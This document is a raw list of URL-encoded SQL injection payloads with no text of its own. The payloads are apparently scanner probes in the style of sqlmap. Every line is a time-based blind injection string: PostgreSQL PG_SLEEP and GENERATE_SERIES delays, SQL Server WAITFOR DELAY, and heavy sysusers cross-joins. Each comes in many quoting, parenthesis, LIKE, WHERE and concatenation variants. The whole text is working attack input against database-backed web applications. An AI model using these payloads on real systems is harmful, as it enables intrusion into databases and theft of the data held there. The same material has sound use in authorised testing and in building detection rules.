1%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%282868%3D2868 1%29%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%287878%3D7878 1%29%29%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%283532%3D3532 1%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29 1%29%20WHERE%204228%3D4228%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20--%20 1%20WHERE%206098%3D6098%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20--%20 1%27%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29 1%27%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29 1%22%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29 1%27%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27pSwK%27%3D%27pSwK 1%27%29%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27cQiC%27%3D%27cQiC 1%27%29%29%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27ywta%27%3D%27ywta 1%27%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%27FBGL%27%3D%27FBGL 1%27%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27kdqF%27%20LIKE%20%27kdqF 1%27%29%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27qAhV%27%20LIKE%20%27qAhV 1%27%29%29%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27mguh%27%20LIKE%20%27mguh 1%27%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%27CLny%27%20LIKE%20%27CLny 1%22%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22HAJu%22%3D%22HAJu 1%22%29%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22RlEi%22%3D%22RlEi 1%22%29%29%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22biKm%22%3D%22biKm 1%22%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%22eraH%22%3D%22eraH 1%22%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22kiWG%22%20LIKE%20%22kiWG 1%22%29%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22MiOl%22%20LIKE%20%22MiOl 1%22%29%29%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22xoNf%22%20LIKE%20%22xoNf 1%22%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%22UWYe%22%20LIKE%20%22UWYe 1%25%27%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27MQti%27%3D%27MQti 1%00%27%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20AND%20%27yZLZ%27%3D%27yZLZ 1%27%29%20WHERE%207359%3D7359%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20--%20 1%22%29%20WHERE%207982%3D7982%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20--%20 1%27%20WHERE%206753%3D6753%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20--%20 1%22%20WHERE%209738%3D9738%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20--%20 1%27%7C%7C%28SELECT%20%27ExWm%27%20FROM%20DUAL%20WHERE%203190%3D3190%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27xNGT%27%20WHERE%207174%3D7174%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20%29%7C%7C%27 1%27%2B%28SELECT%20auhZ%20WHERE%203388%3D3388%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20%29%2B%27 1%27%2B%28SELECT%20%27ILUY%27%20WHERE%201437%3D1437%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%206137%3D%28SELECT%206137%20FROM%20PG_SLEEP%285%29%29%20%23 1%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%29%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%29%29%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%29%20WHERE%208696%3D8696%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%20WHERE%207415%3D7415%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%27%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%27%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%22%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%27%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%27%29%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%27%29%29%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%27%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%27%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%27%29%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%27%29%29%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%27%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%22%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%22%29%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%22%29%29%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%22%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%22%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%22%29%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%22%29%29%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%22%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%25%27%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%25%27%29%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%25%27%29%29%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%25%27%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%00%27%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%00%27%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%27%29%20WHERE%205742%3D5742%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%22%29%20WHERE%206370%3D6370%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%27%20WHERE%201698%3D1698%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%22%20WHERE%209126%3D9126%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%27%7C%7C%28SELECT%20%27IQCb%27%20FROM%20DUAL%20WHERE%201956%3D1956%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%27%7C%7C%28SELECT%20%27mIbt%27%20WHERE%206065%3D6065%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%27%2B%28SELECT%20kwHc%20WHERE%202552%3D2552%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%27%2B%28SELECT%20%27fIgi%27%20WHERE%201619%3D1619%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%27%20IN%20BOOLEAN%20MODE%29%20AND%207159%3D%28SELECT%207159%20FROM%20PG_SLEEP%285%29%29-- 1%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%289680%3D9680 1%29%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%287227%3D7227 1%29%29%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%289349%3D9349 1%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1%29%20WHERE%205388%3D5388%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 1%20WHERE%204028%3D4028%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 1%27%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1%27%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1%22%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1%27%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27oGwC%27%3D%27oGwC 1%27%29%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27xsra%27%3D%27xsra 1%27%29%29%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27uKXE%27%3D%27uKXE 1%27%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27LcMJ%27%3D%27LcMJ 1%27%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27Udnj%27%20LIKE%20%27Udnj 1%27%29%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27Aiwp%27%20LIKE%20%27Aiwp 1%27%29%29%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27ozqj%27%20LIKE%20%27ozqj 1%27%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27IkWb%27%20LIKE%20%27IkWb 1%22%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22nlLJ%22%3D%22nlLJ 1%22%29%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22BFja%22%3D%22BFja 1%22%29%29%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22pJLK%22%3D%22pJLK 1%22%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22IyUl%22%3D%22IyUl 1%22%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22tptL%22%20LIKE%20%22tptL 1%22%29%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22FLBn%22%20LIKE%20%22FLBn 1%22%29%29%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22ztSr%22%20LIKE%20%22ztSr 1%22%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22xRnp%22%20LIKE%20%22xRnp 1%25%27%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27Mwss%27%3D%27Mwss 1%00%27%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27tMSw%27%3D%27tMSw 1%27%29%20WHERE%201784%3D1784%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 1%22%29%20WHERE%204056%3D4056%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 1%27%20WHERE%203687%3D3687%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 1%22%20WHERE%208881%3D8881%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 1%27%7C%7C%28SELECT%20%27AZVG%27%20FROM%20DUAL%20WHERE%209035%3D9035%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27tATJ%27%20WHERE%209654%3D9654%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%7C%7C%27 1%27%2B%28SELECT%20MqyY%20WHERE%209990%3D9990%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%2B%27 1%27%2B%28SELECT%20%27fcuT%27%20WHERE%209184%3D9184%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%205468%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%23 1%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%29%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%29%29%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%29%20WHERE%204347%3D4347%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%20WHERE%206519%3D6519%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%22%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%29%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%29%29%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%29%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%29%29%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%22%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%22%29%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%22%29%29%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%22%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%22%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%22%29%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%22%29%29%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%22%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%25%27%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%25%27%29%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%25%27%29%29%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%25%27%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%00%27%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%00%27%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%29%20WHERE%209098%3D9098%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%22%29%20WHERE%205725%3D5725%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%20WHERE%206997%3D6997%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%22%20WHERE%204723%3D4723%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%7C%7C%28SELECT%20%27QieR%27%20FROM%20DUAL%20WHERE%202776%3D2776%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%7C%7C%28SELECT%20%27CGIM%27%20WHERE%203146%3D3146%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%2B%28SELECT%20FNbP%20WHERE%203955%3D3955%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%2B%28SELECT%20%27uONj%27%20WHERE%206210%3D6210%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%20IN%20BOOLEAN%20MODE%29%20AND%201301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%29%20WHERE%205151%3D5151%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%20WHERE%201264%3D1264%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%25%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%25%27%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%25%27%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%25%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%00%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%00%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%29%20WHERE%204957%3D4957%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%29%20WHERE%205117%3D5117%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%20WHERE%205067%3D5067%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%20WHERE%206041%3D6041%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%7C%7C%28SELECT%20%27HKTj%27%20FROM%20DUAL%20WHERE%203421%3D3421%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%7C%7C%28SELECT%20%27dtvq%27%20WHERE%207383%3D7383%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%2B%28SELECT%20NyxS%20WHERE%201435%3D1435%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%2B%28SELECT%20%27BbRz%27%20WHERE%204349%3D4349%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%20IN%20BOOLEAN%20MODE%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%283093%3D3093 1%29%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%288459%3D8459 1%29%29%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%287736%3D7736 1%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1%29%20WHERE%205442%3D5442%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 1%20WHERE%209949%3D9949%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 1%27%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1%27%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1%22%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 